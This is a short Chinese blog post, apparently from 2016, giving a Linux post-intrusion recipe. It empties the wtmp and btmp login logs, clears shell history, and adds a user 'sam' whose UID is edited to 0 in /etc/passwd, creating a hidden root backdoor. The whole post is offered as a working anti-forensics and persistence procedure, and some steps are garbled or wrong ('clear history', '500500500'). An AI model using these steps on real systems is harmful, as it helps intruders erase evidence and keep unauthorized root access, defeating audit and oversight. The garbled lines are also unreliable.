入侵删除记录 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
删除成功登录记录:
echo > /var/log/wtmp
last

删除失败登录记录:
echo > /var/log/btmp
lastb

删除操作记录
clear history
history -c

留用户
useradd -d /usr/sam -m sam
passwd sam 加入密码

将sam拥有和root一样的权限
打开/etc/passwd 将500500500改成0 保存退出

本文标题:入侵删除记录

文章作者:Dylan Kios

发布时间:2016年05月30日 - 23时53分

最后更新:2016年06月02日 - 11时01分

原始链接:http://0daybug.github.io/2016/05/30/入侵删除记录/

许可协议: "署名-非商用-相同方式共享 3.0" 转载请保留原文链接及作者。

文章目录
,